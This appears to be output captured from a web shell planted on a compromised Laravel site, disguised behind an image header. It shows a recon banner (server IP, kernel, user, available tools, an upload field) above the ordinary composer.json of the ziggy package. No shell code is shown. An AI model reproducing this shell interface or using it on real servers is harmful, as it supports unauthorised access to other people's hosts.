����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.138.36.87 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/./cbt.bofirm.com/vendor/tightenco/ziggy/ |
Upload File : |
{ "name": "tightenco/ziggy", "description": "Generates a Blade directive exporting all of your named Laravel routes. Also provides a nice route() helper function in JavaScript.", "keywords": ["laravel", "routes", "javascript", "ziggy"], "homepage": "https://github.com/tighten/ziggy", "license": "MIT", "require": { "laravel/framework": ">=5.4@dev" }, "authors": [ { "name": "Daniel Coulbourne", "email": "daniel@tighten.co" }, { "name": "Jake Bathman", "email": "jake@tighten.co" }, { "name": "Jacob Baker-Kretzmar", "email": "jacob@tighten.co" } ], "autoload": { "psr-4": { "Tightenco\\Ziggy\\": "src/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "require-dev": { "orchestra/testbench": "^6.0", "phpunit/phpunit": "^9.2" }, "extra": { "laravel": { "providers": [ "Tightenco\\Ziggy\\ZiggyServiceProvider" ] } }, "minimum-stability": "dev", "prefer-stable": true }